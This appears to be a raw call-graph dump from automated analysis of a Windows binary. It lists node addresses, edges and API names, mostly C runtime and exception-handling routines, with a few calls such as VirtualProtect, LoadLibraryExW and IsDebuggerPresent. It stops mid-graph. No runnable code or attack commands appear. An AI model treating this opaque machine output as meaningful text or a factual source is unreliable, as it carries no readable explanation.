HeapFree GetProcessHeap HeapFree 8164->8165 8166 280923814c1 GetProcessHeap HeapFree 8164->8166 8167 28092396180 8165->8167 8166->8165 8166->8166 8168 2809238d2a4 8169 2809238d2de 8168->8169 8170 2809238d306 RtlCaptureContext RtlLookupFunctionEntry 8169->8170 8171 2809238d340 RtlVirtualUnwind 8170->8171 8172 2809238d376 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8170->8172 8171->8172 8173 2809238d3c8 8172->8173 8174 28092387940 _log10_special 4 API calls 8173->8174 8175 2809238d3e7 8174->8175 9084 2809238b3a4 9091 2809238b2d7 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9084->9091 9085 2809238b3cb 9086 28092389634 _CreateFrameInfo 5 API calls 9085->9086 9087 2809238b3d0 9086->9087 9088 28092389634 _CreateFrameInfo 5 API calls 9087->9088 9089 2809238b3db __FrameHandler3::GetHandlerSearchState 9087->9089 9088->9089 9090 28092389ce4 5 API calls Is_bad_exception_allowed 9090->9091 9091->9085 9091->9089 9091->9090 9092 28092389d0c __FrameHandler3::FrameUnwindToEmptyState 5 API calls 9091->9092 9092->9091 8176 28092394e99 8181 28092389634 8176->8181 8178 28092394ea7 8179 28092394eb2 8178->8179 8180 28092389634 _CreateFrameInfo 5 API calls 8178->8180 8180->8179 8184 28092389650 8181->8184 8183 2809238963d 8183->8178 8185 2809238966f __vcrt_InitializeCriticalSectionEx 8184->8185 8191 28092389668 _invalid_parameter_noinfo __vcrt_freefls 8184->8191 8185->8191 8192 28092389fec 8185->8192 8187 280923896a2 _CreateFrameInfo 8188 280923896c9 8187->8188 8190 28092389fec _CreateFrameInfo 5 API calls 8187->8190 8187->8191 8189 28092389fec _CreateFrameInfo 5 API calls 8188->8189 8188->8191 8189->8191 8190->8188 8191->8183 8197 28092389dc4 8192->8197 8195 2809238a02c TlsSetValue 8196 2809238a024 8195->8196 8196->8187 8198 28092389e08 __vcrt_InitializeCriticalSectionEx 8197->8198 8203 28092389ede 8197->8203 8199 28092389e36 LoadLibraryExW 8198->8199 8200 28092389ecd GetProcAddress 8198->8200 8198->8203 8204 28092389e79 LoadLibraryExW 8198->8204 8199->8198 8201 28092389ead 8199->8201 8200->8203 8201->8200 8202 28092389ec4 FreeLibrary 8201->8202 8202->8200 8203->8195 8203->8196 8204->8198 8204->8201 9093 28092393d98 9094 28092393da9 CloseHandle 9093->9094 9095 28092393daf 9093->9095 9094->9095 8629 28092387b1c 8630 28092387b40 __scrt_release_startup_lock 8629->8630 8631 2809238b8e5 8630->8631 8632 2809238cfa0 __std_exception_copy 5 API calls 8630->8632 8633 2809238b90e _invalid_parameter_noinfo 8632->8633 8205 2809238da9c 8206 2809238dac1 8205->8206 8215 2809238dad8 8205->8215 8207 2809238d6ac __std_exception_copy 5 API calls 8206->8207 8209 2809238dac6 8207->8209 8208 2809238db90 8255 2809238befc 8208->8255 8210 2809238d570 _invalid_parameter_noinfo 18 API calls 8209->8210 8212 2809238dad1 8210->8212 8215->8208 8219 2809238db68 8215->8219 8222 2809238db25 8215->8222 8235 2809238dce0 8215->8235 8216 2809238dbf0 8218 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8216->8218 8217 2809238dc81 8221 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8217->8221 8220 2809238dbf7 8218->8220 8223 2809238db48 8219->8223 8227 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8219->8227 8220->8223 8226 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8220->8226 8224 2809238dc8c 8221->8224 8222->8223 8230 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8222->8230 8229 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8223->8229 8228 2809238dca5 8224->8228 8231 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8224->8231 8225 2809238dc22 8225->8217 8225->8225 8234 2809238dcc7 8225->8234 8261 28092390f50 8225->8261 8226->8220 8227->8219 8232 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8228->8232 8229->8212 8230->8222 8231->8224 8232->8212 8236 2809238dd0e 8235->8236 8236->8236 8237 2809238d6cc __std_exception_copy 5 API calls 8236->8237 8238 2809238dd59 8237->8238 8239 28092390f50 18 API calls 8238->8239 8240 2809238dd8f 8239->8240 8241 2809238e1b4 15 API calls 8240->8241 8242 2809238df46 8241->8242 8270 2809238f5a8 8242->8270 8247 2809238e00d 8248 2809238e1b4 15 API calls 8247->8248 8249 2809238e03d 8248->8249 8250 2809238f5a8 4 API calls 8249->8250 8251 2809238e066 8250->8251 8290 2809238d910 8251->8290 8254 2809238dce0 22 API calls 8256 2809238bf4c 8255->8256 8257 2809238bf14 8255->8257 8256->8216 8256->8225 8257->8256 8258 2809238d6cc __std_exception_copy 5 API calls 8257->8258 8259 2809238bf42 8258->8259 8260 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8259->8260 8260->8256 8266 28092390f6d 8261->8266 8262 28092390f72 8263 28092390f88 8262->8263 8264 2809238d6ac __std_exception_copy 5 API calls 8262->8264 8263->8225 8265 28092390f7c 8264->8265 8267 2809238d570 _invalid_parameter_noinfo 18 API calls 8265->8267 8266->8262 8266->8263 8268 28092390fbc 8266->8268 8267->8263 8268->8263 8269 2809238d6ac __std_exception_copy 5 API calls 8268->8269 8269->8265 8271 2809238f394 4 API calls 8270->8271 8272 2809238df71 8271->8272 8273 2809238d794 8272->8273 8274 2809238d7be 8273->8274 8275 2809238d7e2 8273->8275 8277 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8274->8277 8279 2809238d7cd FindFirstFileExW 8274->8279 8276 2809238d7e7 8275->8276 8282 2809238d83c 8275->8282 8278 2809238d7fc 8276->8278 8276->8279 8280 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8276->8280 8277->8279 8281 2809238ca0c 5 API calls 8278->8281 8279->8247 8280->8278 8281->8279 8283 2809238d85f __vcrt_InitializeCriticalSectionEx 8282->8283 8284 2809238d88d 8282->8284 8285 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8282->8285 8283->8279 8307 2809238d620 8283->8307 8286 2809238ca0c 5 API calls 8284->8286 8285->8284 8286->8283 8289 2809238d6ac __std_exception_copy 5 API calls 8289->8279 8291 2809238d93a 8290->8291 8292 2809238d95e 8290->8292 8294 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8291->8294 8296 2809238d949 8291->8296 8293 2809238d964 8292->8293 8300 2809238d9b8 8292->8300 8295 2809238d979 8293->8295 8293->8296 8297 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8293->8297 8294->8296 8298 2809238ca0c 5 API calls 8295->8298 8296->8254 8297->8295 8298->8296 8299 2809238da14 8304 2809238ca0c 5 API calls 8299->8304 8300->8299 8301 2809238d9e3 __vcrt_InitializeCriticalSectionEx 8300->8301 8303 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8300->8303 8301->8296 8302 2809238d620 5 API calls 8301->8302 8305 2809238d9f0 8302->8305 8303->8299 8304->8301 8306 2809238d6ac __std_exception_copy 5 API calls 8305->8306 8306->8296 8308 2809238cfa0 __std_exception_copy 5 API calls 8307->8308 8309 2809238d62d Concurrency::details::SchedulerProxy::DeleteThis 8308->8309 8310 2809238cfa0 __std_exception_copy 5 API calls 8309->8310 8311 2809238d64f 8310->8311 8311->8289 8312 28092394c9f 8313 28092394cb7 8312->8313 8319 28092394d22 8312->8319 8314 28092389634 _CreateFrameInfo 5 API calls 8313->8314 8313->8319 8315 28092394d04 8314->8315 8316 28092389634 _CreateFrameInfo 5 API calls 8315->8316 8317 28092394d19 8316->8317 8320 2809238c6a8 8317->8320 8321 2809238ce28 _invalid_parameter_noinfo 15 API calls 8320->8321 8322 2809238c6b1 _invalid_parameter_noinfo 8321->8322 8323 28092387a90 8325 28092387a99 __scrt_release_startup_lock 8323->8325 8324 28092387a9d 8325->8324 8327 2809238bf5c 8325->8327 8328 2809238bf7c 8327->8328 8348 2809238bf93 8327->8348 8329 2809238bf9a 8328->8329 8330 2809238bf84 8328->8330 8331 2809238ec90 38 API calls 8329->8331 8332 2809238d6ac __std_exception_copy 5 API calls 8330->8332 8333 2809238bf9f 8331->8333 8334 2809238bf89 8332->8334 8358 2809238e374 GetModuleFileNameW 8333->8358 8336 2809238d570 _invalid_parameter_noinfo 18 API calls 8334->8336 8336->8348 8340 2809238befc 5 API calls 8341 2809238c009 8340->8341 8342 2809238c029 8341->8342 8343 2809238c011 8341->8343 8344 2809238bd34 15 API calls 8342->8344 8345 2809238d6ac __std_exception_copy 5 API calls 8343->8345 8350 2809238c045 8344->8350 8346 2809238c016 8345->8346 8347 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8346->8347 8347->8348 8348->8324 8349 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8349->8348 8351 2809238c077 8350->8351 8353 2809238c090 8350->8353 8356 2809238c04b 8350->8356 8352 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8351->8352 8354 2809238c080 8352->8354 8353->8353 8355 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8353->8355 8357 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8354->8357 8355->8356 8356->8349 8357->8348 8359 2809238e3b9 __vcrt_InitializeCriticalSectionEx 8358->8359 8360 2809238e3cd 8358->8360 8363 2809238d620 5 API calls 8359->8363 8361 2809238e1b4 15 API calls 8360->8361 8362 2809238e3fb 8361->8362 8364 2809238f5a8 4 API calls 8362->8364 8369 2809238e40c 8362->8369 8365 2809238e3c6 8363->8365 8364->8369 8367 28092387940 _log10_special 4 API calls 8365->8367 8368 2809238bfb6 8367->8368 8370 2809238bd34 8368->8370 8376 2809238e258 8369->8376 8373 2809238bd72 8370->8373 8372 2809238bdde 8374 2809238becf 8372->8374 8375 2809238f040 15 API calls 8372->8375 8373->8372 8385 2809238f040 8373->8385 8374->8340 8375->8372 8378 2809238e27c 8376->8378 8379 2809238e297 8376->8379 8377 2809238e29c 8377->8378 8380 2809238d6ac __std_exception_copy 5 API calls 8377->8380 8378->8365 8379->8377 8381 2809238e2fa __vcrt_InitializeCriticalSectionEx 8379->8381 8380->8378 8381->8378 8382 2809238d620 5 API calls 8381->8382 8383 2809238e307 8382->8383 8384 2809238d6ac __std_exception_copy 5 API calls 8383->8384 8384->8378 8386 2809238efcc 8385->8386 8387 2809238e1b4 15 API calls 8386->8387 8388 2809238eff0 8387->8388 8388->8373 9096 28092382990 9098 280923829e4 9096->9098 9097 280923829ff 9098->9097 9100 28092383130 9098->9100 9101 280923831c6 9100->9101 9103 28092383155 9100->9103 9101->9097 9102 28092383844 StrCmpNIW 9102->9103 9103->9101 9103->9102 9104 28092381ce0 StrCmpIW StrCmpW 9103->9104 9104->9103 9450 28092382a14 9452 28092382a71 9450->9452 9451 28092382a8c 9452->9451 9453 280923831e4 3 API calls 9452->9453 9453->9451 9454 2809238b014 9455 28092389634 _CreateFrameInfo 5 API calls 9454->9455 9456 2809238b049 9455->9456 9457 28092389634 _CreateFrameInfo 5 API calls 9456->9457 9458 2809238b057 __except_validate_context_record 9457->9458 9459 28092389634 _CreateFrameInfo 5 API calls 9458->9459 9460 2809238b09b 9459->9460 9461 28092389634 _CreateFrameInfo 5 API calls 9460->9461 9462 2809238b0a4 9461->9462 9463 28092389634 _CreateFrameInfo 5 API calls 9462->9463 9464 2809238b0ad 9463->9464 9477 28092389c54 9464->9477 9467 28092389634 _CreateFrameInfo 5 API calls 9468 2809238b0dd __CxxCallCatchBlock 9467->9468 9469 28092389c90 __CxxCallCatchBlock 5 API calls 9468->9469 9474 2809238b18e 9469->9474 9470 2809238b1b7 __CxxCallCatchBlock 9471 28092389634 _CreateFrameInfo 5 API calls 9470->9471 9472 2809238b1ca 9471->9472 9473 28092389634 _CreateFrameInfo 5 API calls 9472->9473 9476 2809238b1d3 9473->9476 9474->9470 9475 28092389320 __CxxCallCatchBlock 5 API calls 9474->9475 9475->9470 9478 28092389634 _CreateFrameInfo 5 API calls 9477->9478 9479 28092389c65 9478->9479 9480 28092389c70 9479->9480 9481 28092389634 _CreateFrameInfo 5 API calls 9479->9481 9482 28092389634 _CreateFrameInfo 5 API calls 9480->9482 9481->9480 9483 28092389c81 9482->9483 9483->9467 9483->9468 9105 28092390388 9106 28092390393 9105->9106 9114 28092392c88 9106->9114 9108 28092390398 9120 28092392d3c 9108->9120 9111 280923903c9 9112 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9111->9112 9113 280923903d5 9112->9113 9119 28092392ca1 9114->9119 9115 28092392d21 9115->9108 9116 28092392cec DeleteCriticalSection 9118 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9116->9118 9118->9119 9119->9115 9119->9116 9124 280923934fc 9119->9124 9121 280923903aa DeleteCriticalSection 9120->9121 9122 28092392d50 9120->9122 9121->9108 9121->9111 9122->9121 9123 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9122->9123 9123->9121 9125 2809239352c 9124->9125 9132 280923933d8 9125->9132 9127 28092393545 9128 2809238c7a0 _invalid_parameter_noinfo 18 API calls 9127->9128 9130 2809239356a 9127->9130 9128->9130 9129 2809239357f 9129->9119 9130->9129 9131 2809238c7a0 _invalid_parameter_noinfo 18 API calls 9130->9131 9131->9129 9133 280923933f3 9132->9133 9134 28092393421 9132->9134 9135 2809238d4a4 _invalid_parameter_noinfo 18 API calls 9133->9135 9137 28092393413 9134->9137 9138 28092393454 9134->9138 9135->9137 9137->9127 9139 2809239346f 9138->9139 9140 28092393494 9138->9140 9141 2809238d4a4 _invalid_parameter_noinfo 18 API calls 9139->9141 9142 2809239348f 9140->9142 9152 28092390100 9140->9152 9141->9142 9142->9137 9145 28092392d3c 5 API calls 9146 280923934b1 9145->9146 9158 2809239064c 9146->9158 9151 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9151->9142 9153 28092390126 9152->9153 9154 28092390157 9152->9154 9153->9154 9155 2809239064c 18 API calls 9153->9155 9154->9145 9156 28092390147 9155->9156 9171 28092392860 9156->9171 9159 28092390655 9158->9159 9163 28092390665 9158->9163 9160 2809238d6ac __std_exception_copy 5 API calls 9159->9160 9161 2809239065a 9160->9161 9162 2809238d570 _invalid_parameter_noinfo 18 API calls 9161->9162 9162->9163 9164 28092393eec 9163->9164 9165 28092393f18 9164->9165 9166 280923934c3 9164->9166 9167 28092393f7c 9165->9167 9169 28092393f48 9165->9169 9166->9142 9166->9151 9168 2809238d4a4 _invalid_parameter_noinfo 18 API calls 9167->9168 9168->9166 9260 28092393e74 9169->9260 9173 280923928b6 9171->9173 9177 28092392889 9171->9177 9172 280923928cf 9174 2809238d4a4 _invalid_parameter_noinfo 18 API calls 9172->9174 9173->9172 9175 28092392926 9173->9175 9174->9177 9175->9177 9178 28092392980 9175->9178 9177->9154 9179 280923929ab 9178->9179 9201 280923929df __vcrt_InitializeCriticalSectionEx 9178->9201 9180 280923929b0 9179->9180 9182 28092392a1e 9179->9182 9181 2809238d4a4 _invalid_parameter_noinfo 18 API calls 9180->9181 9181->9201 9183 28092392a34 9182->9183 9204 28092393394 9182->9204 9210 28092392d80 9183->9210 9186 28092392b5c 9187 28092392b6e 9186->9187 9188 28092392bc0 WriteFile 9186->9188 9189 28092392bac 9187->9189 9190 28092392b76 9187->9190 9188->9201 9239 280923924d0 9189->9239 9192 28092392b98 9190->9192 9193 28092392b7b 9190->9193 9191 28092392a40 9191->9186 9194 28092392a8f GetConsoleMode 9191->9194 9233 280923926f0 9192->9233 9193->9201 9227 280923925d4 9193->9227 9194->9186 9197 28092392aaa 9194->9197 9199 28092392b39 9197->9199 9203 28092392ab6 9197->9203 9218 28092392058 GetConsoleOutputCP 9199->9218 9201->9177 9202 2809239339c CreateFileW WriteConsoleW CloseHandle CreateFileW WriteConsoleW 9202->9203 9203->9201 9203->9202 9205 280923932e8 9204->9205 9245 28092391ec0 9205->9245 9208 28092393326 SetFilePointerEx 9209 28092393315 __vcrt_InitializeCriticalSectionEx 9208->9209 9209->9183 9211 28092392d89 9210->9211 9213 28092392d96 9210->9213 9212 2809238d6ac __std_exception_copy 5 API calls 9211->9212 9214 28092392d8e 9212->9214 9213->9214 9215 2809238d6ac __std_exception_copy 5 API calls 9213->9215 9214->9191 9216 28092392dcd 9215->9216 9217 2809238d570 _invalid_parameter_noinfo 18 API calls 9216->9217 9217->9214 9224 280923920ec 9218->9224 9219 28092387940 _log10_special 4 API calls 9220 280923924b2 9219->9220 9220->9201 9221 280923904d4 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 9221->9224 9222 28092392420 __vcrt_InitializeCriticalSectionEx 9222->9219 9223 28092392e24 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 9223->9224 9224->9221 9224->9222 9224->9223 9225 28092392388 WriteFile 9224->9225 9226 280923923c8 WriteFile 9224->9226 9225->9222 9225->9224 9226->9222 9226->9224 9231 280923925ec 9227->9231 9228 28092387940 _log10_special 4 API calls 9229 280923926d5 9228->9229 9229->9201 9230 2809239267b WriteFile 9230->9231 9232 280923926b8 __vcrt_InitializeCriticalSectionEx 9230->9232 9231->9230 9231->9232 9232->9228 9234 2809239270c 9233->9234 9237 28092392829 __vcrt_InitializeCriticalSectionEx 9234->9237 9238 280923927e6 WriteFile 9234->9238 9235 28092387940 _log10_special 4 API calls 9236 28092392844 9235->9236 9236->9201 9237->9235 9238->9234 9238->9237 9241 280923924e8 9239->9241 9240 28092387940 _log10_special 4 API calls 9242 280923925ba 9240->9242 9243 28092392566 WriteFile 9241->9243 9244 2809239259d __vcrt_InitializeCriticalSectionEx 9241->9244 9242->9201 9243->9241 9243->9244 9244->9240 9246 28092391ec9 9245->9246 9247 28092391ede 9245->9247 9257 2809238d68c 9246->9257 9249 2809238d68c 5 API calls 9247->9249 9254 28092391ed6 9247->9254 9251 28092391f19 9249->9251 9253 2809238d6ac __std_exception_copy 5 API calls 9251->9253 9252 2809238d6ac __std_exception_copy 5 API calls 9252->9254 9255 28092391f21 9253->9255 9254->9208 9254->9209 9256 2809238d570 _invalid_parameter_noinfo 18 API calls 9255->9256 9256->9254 9258 2809238cfa0 __std_exception_copy 5 API calls 9257->9258 9259 2809238d695 9258->9259 9259->9252 9261 28092393e90 9260->9261 9263 28092393ec5 9261->9263 9264 28092393fb0 9261->9264 9263->9166 9265 28092391ec0 18 API calls 9264->9265 9268 28092393fcc 9265->9268 9266 28092393fd2 __vcrt_InitializeCriticalSectionEx 9276 28092391e04 9266->9276 9268->9266 9269 28092391ec0 18 API calls 9268->9269 9275 2809239400f 9268->9275 9271 28092394002 9269->9271 9270 28092391ec0 18 API calls 9272 2809239401b CloseHandle 9270->9272 9274 28092391ec0 18 API calls 9271->9274 9272->9266 9273 28092394037 9273->9263 9274->9275 9275->9266 9275->9270 9277 28092391e20 9276->9277 9278 28092391e92 9276->9278 9277->9278 9282 28092391e53 9277->9282 9279 2809238d6ac __std_exception_copy 5 API calls 9278->9279 9280 28092391e97 9279->9280 9281 2809238d68c 5 API calls 9280->9281 9283 28092391e84 9281->9283 9282->9283 9284 28092391e7c SetStdHandle 9282->9284 9283->9273 9284->9283 8389 2809238588c 8391 28092385893 8389->8391 8390 280923858c0 VirtualProtect 8392 280923858e9 GetLastError 8390->8392 8393 280923857d0 8390->8393 8391->8390 8391->8393 8392->8393 8394 2809239148c 8395 2809239149e 8394->8395 8396 280923914c5 8395->8396 8398 280923914de 8395->8398 8397 2809238d6ac __std_exception_copy 5 API calls 8396->8397 8399 280923914ca 8397->8399 8400 280923914d5 8398->8400 8402 2809238e1b4 15 API calls 8398->8402 8401 2809238d570 _invalid_parameter_noinfo 18 API calls 8399->8401 8401->8400 8402->8400 8403 2809238fa8c 8404 2809238fa98 8403->8404 8405 2809238fabf 8404->8405 8407 28092391cbc 8404->8407 8408 28092391cfc 8407->8408 8409 28092391cc1 8407->8409 8408->8404 8410 28092391ce2 DeleteCriticalSection 8409->8410 8411 28092391cf4 8409->8411 8410->8410 8410->8411 8412 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8411->8412 8412->8408 9285 2809238c58c 9286 2809238c5a5 9285->9286 9287 2809238c5bd 9285->9287 9286->9287 9288 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 9286->9288 9288->9287 8634 2809238b10e 8635 28092389634 _CreateFrameInfo 5 API calls 8634->8635 8637 2809238b11b __CxxCallCatchBlock 8635->8637 8636 2809238b15f RaiseException 8638 2809238b186 8636->8638 8637->8636 8647 28092389c90 8638->8647 8641 28092389634 _CreateFrameInfo 5 API calls 8642 2809238b1ca 8641->8642 8643 28092389634 _CreateFrameInfo 5 API calls 8642->8643 8645 2809238b1d3 8643->8645 8646 2809238b1b7 __CxxCallCatchBlock 8646->8641 8648 28092389634 _CreateFrameInfo 5 API calls 8647->8648 8649 28092389ca2 8648->8649 8650 28092389cdd 8649->8650 8651 28092389634 _CreateFrameInfo 5 API calls 8649->8651 8652 28092389cad 8651->8652 8652->8650 8653 28092389634 _CreateFrameInfo 5 API calls 8652->8653 8654 28092389cce 8653->8654 8654->8646 8655 28092389320 8654->8655 8656 28092389634 _CreateFrameInfo 5 API calls 8655->8656 8657 2809238932e 8656->8657 8657->8646 8413 28092394e83 8416 28092389374 8413->8416 8417 2809238938c 8416->8417 8418 2809238939e 8416->8418 8417->8418 8419 28092389394 8417->8419 8420 28092389634 _CreateFrameInfo 5 API calls 8418->8420 8421 28092389634 _CreateFrameInfo 5 API calls 8419->8421 8426 2809238939c 8419->8426 8422 280923893a3 8420->8422 8423 280923893c3 8421->8423 8424 28092389634 _CreateFrameInfo 5 API calls 8422->8424 8422->8426 8425 28092389634 _CreateFrameInfo 5 API calls 8423->8425 8424->8426 8427 280923893d0 8425->8427 8428 2809238c6a8 15 API calls 8427->8428 8429 280923893d9 8428->8429 8430 2809238c6a8 15 API calls 8429->8430 8431 280923893e5 8430->8431 8658 2809238ad78 8659 2809238ada5 __except_validate_context_record 8658->8659 8660 28092389634 _CreateFrameInfo 5 API calls 8659->8660 8663 2809238adaa 8660->8663 8661 2809238ae04 8665 2809238ae7f 8661->8665 8672 2809238ae58 8661->8672 8673 2809238ae26 __GetCurrentState 8661->8673 8662 2809238ae92 8669 2809238aeb1 8662->8669 8694 28092389ce4 8662->8694 8663->8661 8663->8662 8663->8672 8664 2809238af00 8664->8672 8700 2809238a544 8664->8700 8687 280923898e0 8665->8687 8669->8664 8669->8672 8697 28092389cf8 8669->8697 8670 2809238afa9 8673->8670 8675 2809238b288 8673->8675 8676 28092389ce4 Is_bad_exception_allowed 5 API calls 8675->8676 8677 2809238b2b7 __GetCurrentState 8676->8677 8678 28092389634 _CreateFrameInfo 5 API calls 8677->8678 8683 2809238b2d4 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8678->8683 8679 2809238b3cb 8680 28092389634 _CreateFrameInfo 5 API calls 8679->8680 8681 2809238b3d0 8680->8681 8682 28092389634 _CreateFrameInfo 5 API calls 8681->8682 8684 2809238b3db __FrameHandler3::GetHandlerSearchState 8681->8684 8682->8684 8683->8679 8683->8684 8685 28092389ce4 5 API calls Is_bad_exception_allowed 8683->8685 8757 28092389d0c 8683->8757 8684->8672 8685->8683 8760 28092389944 8687->8760 8689 280923898ff __FrameHandler3::ExecutionInCatch 8764 28092389850 8689->8764 8692 2809238b288 __FrameHandler3::FrameUnwindToEmptyState 5 API calls 8693 28092389934 8692->8693 8693->8672 8695 28092389634 _CreateFrameInfo 5 API calls 8694->8695 8696 28092389ced 8695->8696 8696->8669 8698 28092389634 _CreateFrameInfo 5 API calls 8697->8698 8699 28092389d01 8698->8699 8699->8664 8768 2809238b414 8700->8768 8702 2809238aa12 8703 2809238a963 8703->8702 8744 2809238a961 8703->8744 8821 2809238aa1c 8703->8821 8704 2809238a68b 8704->8703 8716 2809238a6c3 8704->8716 8706 28092389634 _CreateFrameInfo 5 API calls 8707 2809238a9a5 8706->8707 8707->8702 8712 28092387940 _log10_special 4 API calls 8707->8712 8708 2809238a894 8713 2809238a8b1 8708->8713 8715 28092389ce4 Is_bad_exception_allowed 5 API calls 8708->8715 8708->8744 8709 28092389634 _CreateFrameInfo 5 API calls 8711 2809238a5f2 8709->8711 8711->8707 8717 28092389634 _CreateFrameInfo 5 API calls 8711->8717 8714 2809238a9b8 8712->8714 8720 2809238a8d3 8713->8720 8713->8744 8814 280923898b4 8713->8814 8714->8672 8715->8713 8716->8708 8729 28092389cf8 LoadLibraryExW LoadLibraryExW FreeLibrary GetProcAddress TlsSetValue 8716->8729 8793 2809238ac38 8716->8793 8807 2809238a470 8716->8807 8719 2809238a602 8717->8719 8721 28092389634 _CreateFrameInfo 5 API calls 8719->8721 8722 2809238a8e9 8720->8722 8720->8744 8754 2809238a9f5 8720->8754 8723 2809238a60b 8721->8723 8724 2809238a8f4 8722->8724 8728 28092389ce4 Is_bad_exception_allowed 5 API calls 8722->8728 8779 28092389d24 8723->8779 8731 2809238b4ac 5 API calls 8724->8731 8725 28092389634 _CreateFrameInfo 5 API calls 8727 2809238a9fb 8725->8727 8730 28092389634 _CreateFrameInfo 5 API calls 8727->8730 8728->8724 8729->8716 8732 2809238aa04 8730->8732 8734 2809238a90b 8731->8734 8736 2809238c6a8 15 API calls 8732->8736 8738 28092389944 __GetUnwindTryBlock RtlLookupFunctionEntry 8734->8738 8734->8744 8735 28092389634 _CreateFrameInfo 5 API calls 8737 2809238a64d 8735->8737 8736->8702 8737->8704 8740 28092389634 _CreateFrameInfo 5 API calls 8737->8740 8739 2809238a925 8738->8739 8818 28092389b50 RtlUnwindEx 8739->8818 8742 2809238a659 8740->8742 8745 28092389634 _CreateFrameInfo 5 API calls 8742->8745 8744->8706 8746 2809238a662 8745->8746 8782 2809238b4ac 8746->8782 8750 2809238a676 8789 2809238b59c 8750->8789 8752 2809238a9ef 8753 2809238c6a8 15 API calls 8752->8753 8753->8754 8754->8725 8755 2809238a67e __CxxCallCatchBlock std::bad_alloc::bad_alloc 8755->8752 8833 280923894a0 8755->8833 8758 28092389634 _CreateFrameInfo 5 API calls 8757->8758 8759 28092389d1a 8758->8759 8759->8683 8762 28092389972 __FrameHandler3::ExecutionInCatch 8760->8762 8761 2809238999e RtlLookupFunctionEntry 8761->8762 8762->8761 8763 280923899e2 8762->8763 8763->8689 8766 2809238986e 8764->8766 8765 2809238989b 8765->8692 8766->8765 8767 28092389634 _CreateFrameInfo 5 API calls 8766->8767 8767->8766 8769 2809238b439 __FrameHandler3::ExecutionInCatch 8768->8769 8770 28092389944 __GetUnwindTryBlock RtlLookupFunctionEntry 8769->8770 8771 2809238b44e 8770->8771 8838 2809238a0cc 8771->8838 8774 2809238b460 __FrameHandler3::GetHandlerSearchState 8841 2809238a104 8774->8841 8775 2809238b483 8776 2809238a0cc __GetUnwindTryBlock RtlLookupFunctionEntry 8775->8776 8778 2809238a5a6 8776->8778 8778->8702 8778->8704 8778->8709 8780 28092389634 _CreateFrameInfo 5 API calls 8779->8780 8781 28092389d32 8780->8781 8781->8702 8781->8735 8783 2809238b593 8782->8783 8786 2809238b4d7 8782->8786 8784 2809238a672 8784->8704 8784->8750 8785 28092389cf8 LoadLibraryExW LoadLibraryExW FreeLibrary GetProcAddress TlsSetValue 8785->8786 8786->8784 8786->8785 8787 28092389ce4 Is_bad_exception_allowed 5 API calls 8786->8787 8788 2809238ac38 5 API calls 8786->8788 8787->8786 8788->8786 8791 2809238b5b9 Is_bad_exception_allowed 8789->8791 8792 2809238b609 8789->8792 8790 28092389ce4 5 API calls Is_bad_exception_allowed 8790->8791 8791->8790 8791->8792 8792->8755 8794 2809238ac65 8793->8794 8805 2809238acf4 8793->8805 8795 28092389ce4 Is_bad_exception_allowed 5 API calls 8794->8795 8796 2809238ac6e 8795->8796 8797 28092389ce4 Is_bad_exception_allowed 5 API calls 8796->8797 8798 2809238ac87 8796->8798 8796->8805 8797->8798 8799 2809238acb3 8798->8799 8800 28092389ce4 Is_bad_exception_allowed 5 API calls 8798->8800 8798->8805 8801 28092389cf8 5 API calls 8799->8801 8800->8799 8802 2809238acc7 8801->8802 8803 2809238ace0 8802->8803 8804 28092389ce4 Is_bad_exception_allowed 5 API calls 8802->8804 8802->8805 8806 28092389cf8 5 API calls 8803->8806 8804->8803 8805->8716 8806->8805 8808 28092389944 __GetUnwindTryBlock RtlLookupFunctionEntry 8807->8808 8809 2809238a4ad 8808->8809 8810 28092389ce4 Is_bad_exception_allowed 5 API calls 8809->8810 8811 2809238a4e5 8810->8811 8812 28092389b50 5 API calls 8811->8812 8813 2809238a529 8812->8813 8813->8716 8815 280923898c8 __FrameHandler3::ExecutionInCatch 8814->8815 8816 28092389850 __FrameHandler3::ExecutionInCatch 5 API calls 8815->8816 8817 280923898d2 8816->8817 8817->8720 8819 28092387940 _log10_special 4 API calls 8818->8819 8820 28092389c4a 8819->8820 8820->8744 8822 2809238aa52 8821->8822 8827 2809238aac0 8821->8827 8823 28092389634 _CreateFrameInfo 5 API calls 8822->8823 8824 2809238aa57 8823->8824 8825 2809238aa66 EncodePointer 8824->8825 8830 2809238aabc 8824->8830 8826 28092389634 _CreateFrameInfo 5 API calls 8825->8826 8828 2809238aa76 8826->8828 8827->8744 8828->8830 8844 280923897fc 8828->8844 8830->8827 8831 2809238a470 11 API calls 8830->8831 8832 28092389ce4 5 API calls 